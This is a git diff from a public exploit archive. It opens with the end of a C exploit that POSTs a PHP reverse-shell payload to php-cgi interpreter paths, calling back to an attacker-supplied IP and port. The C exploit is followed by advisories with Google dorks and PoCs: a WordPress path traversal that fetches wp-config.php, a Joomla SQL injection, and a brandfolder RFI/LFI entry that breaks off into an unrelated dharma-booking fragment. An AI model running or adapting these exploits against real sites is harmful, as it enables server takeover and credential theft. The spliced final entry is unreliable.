exit(255); + } + memcpy(forceinterpreter, optarg, strlen(optarg)+1); + break; + default: + usage(argv); + } + break; + + default: + usage(argv); + } + } + + if ((optind < argc) || !target || !protocol || !port || + !reverseip || !reverseport){ + usage(argv); + } + + server = gethostbyname_(target, port); + if (!server) { + printf("Error while resolving hostname. (7)\n"); + exit(255); + } + + char *interpreters[5]; + int ninterpreters = 5; + interpreters[0] = strdup("/cgi-bin/php"); + interpreters[1] = strdup("/cgi-bin/php5"); + interpreters[2] = strdup("/cgi-bin/php-cgi"); + interpreters[3] = strdup("/cgi-bin/php.cgi"); + interpreters[4] = strdup("/cgi-bin/php4"); + + for (i=0;ihandle = NULL; + sslconnection->ctx = NULL; + + SSL_library_init(); + + sslconnection->ctx = SSL_CTX_new(SSLv23_client_method()); + if (!sslconnection->ctx) { + printf("SSL_CTX_new error (11)\n"); + exit(255); + } + + sslconnection->handle = SSL_new(sslconnection->ctx); + if (!sslconnection->handle) { + printf("SSL_new error (12)\n"); + exit(255); + } + if (!SSL_set_fd(sslconnection->handle, sockfd)) { + printf("SSL_set_fd error (13)\n"); + exit(255); + } + + if (SSL_connect(sslconnection->handle) != 1) { + printf("SSL_connect error (14)\n"); + exit(255); + } + } + + tmpsize = strlen(phpstr) + strlen(reverseip) + strlen(reverseportstr) + 64; + tmpstr = (char*)calloc(tmpsize, sizeof(char)); + snprintf(tmpstr, tmpsize, phpstr, reverseip, reverseport); + + writesize = strlen(target) + strlen(interpreter) + + strlen(poststr) + strlen(tmpstr) + 64; + writestr = (char*)calloc(writesize, sizeof(char)); + snprintf(writestr, writesize, poststr, interpreter, + target, strlen(tmpstr), tmpstr); + + if (!httpsflag) { + write(sockfd, writestr, strlen(writestr)); + readbuf = read_(sockfd); + } else { + SSL_write(sslconnection->handle, writestr, strlen(writestr)); + readbuf = sslread(sslconnection); + } + + if (readbuf) { + printf("***SERVER RESPONSE***\n\n%s\n\n", readbuf); + } else { + printf("read error (15)\n"); + exit(255); + } + } + exit(1); +} + diff --git a/platforms/php/webapps/39589.txt b/platforms/php/webapps/39589.txt new file mode 100755 index 000000000..3d694914f --- /dev/null +++ b/platforms/php/webapps/39589.txt @@ -0,0 +1,22 @@ +# Exploit Title: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download +# Exploit Author: CrashBandicot +# Date: 2016-03-22 +# Google Dork : inurl:/wp-content/plugins/hb-audio-gallery-lite +# Vendor Homepage: https://fr.wordpress.org/plugins/hb-audio-gallery-lite/ +# Tested on: MSWin32 +# Version: 1.0.0 + +# Vuln file : gallery/audio-download.php + +11. if( $_REQUEST['file_size'] && $_REQUEST['file_path'] ) { +13. $file_size = $_REQUEST['file_size']; +15. $file = $_REQUEST['file_path']; +17. $filename = basename($file); +.... +55. Header("Content-Disposition: attachment; filename='" . $filename . "'"); + + +# PoC : /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 + + +# 22/03/2016 - Informed Vendor about Issue \ No newline at end of file diff --git a/platforms/php/webapps/39590.txt b/platforms/php/webapps/39590.txt new file mode 100755 index 000000000..b8250d1fe --- /dev/null +++ b/platforms/php/webapps/39590.txt @@ -0,0 +1,21 @@ +###################### +# Exploit Title : Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability +# Exploit Author : Persian Hack Team +# Vendor Homepage : http://extensions.joomla.org/extension/easy-youtube-gallery +# Google Dork : inurl:com_easy_youtube_gallery mycategory +# Date: 2016/03/22 +# Version: 1.0.2 +###################### +# PoC: +# mycategory=[SQL] +# +# Demo: +# http://server/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0%27&defaultvideo=9&Itemid=752 +# +###################### +# Discovered by : +# Mojtaba MobhaM (kazemimojtaba@live.com) +# T3NZOG4N (t3nz0g4n@yahoo.com) +# Homepage : persian-team.ir +# Greetz : Milad_Hacking & FireKernel And You +###################### \ No newline at end of file diff --git a/platforms/php/webapps/39591.txt b/platforms/php/webapps/39591.txt new file mode 100755 index 000000000..6d28df951 --- /dev/null +++ b/platforms/php/webapps/39591.txt @@ -0,0 +1,35 @@ +# Exploit Title: Wordpress brandfolder plugin / RFI & LFI +# Google Dork: inurl:wp-content/plugins/brandfolder +# Date: 03/22/2016 +# Exploit Author: AMAR^SHG +# Vendor Homepage: https://brandfolder.com +# Software Link: https://wordpress.org/plugins/brandfolder/ +# Version: <=3.0 +# Tested on: WAMP / Windows + +I-Details +The vulnerability occurs at the first lines of the file callback.php: + +Software +Link : https://wordpress.org/plugins/dharma-booking/ + +# Version: <=2.28.3 + +# Tested on: WINDOWS/WAMP + + +dharma-booking/frontend/ajax/gateways/proccess.php's code: +